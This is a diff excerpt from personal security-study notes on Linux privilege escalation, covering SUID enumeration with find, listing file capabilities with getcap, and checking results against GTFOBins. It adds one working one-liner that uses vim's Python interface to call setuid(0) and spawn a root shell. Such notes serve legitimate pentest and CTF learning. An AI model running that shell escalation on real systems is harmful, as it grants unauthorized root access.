redBearded23/infoSecNotes/infosec_notes/LinuxPrivilegeEscalation.md

     - `-u=s` any of the permission bits mode are set for the files
     - `-type f` only search filge
     - `2>/dev/null` suppress errors
+  - alternative: `find / -type f -perm -04000 -ls 2>/dev/null`
+- a good practice would be to compare executables on this list with GTFOBins

+### Step: Capabilities

+- another method to increase privilege level of a process or binary: Capabilities
+- help manage privileges at more granular level for binary or process
+- `getcap`: List enabled capabilities
+  - when run as unprivileged user, `getcap -r /` will generate huge amount of errors
+  - better to redirect them to `/dev/null`: `getcap -r / 2>/dev/null`
+- GTFOBins has good list of binaries that can be leveraged for priv esc if we find any set capabilities

+./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

 ### Step 5: can we read/write sensitive files?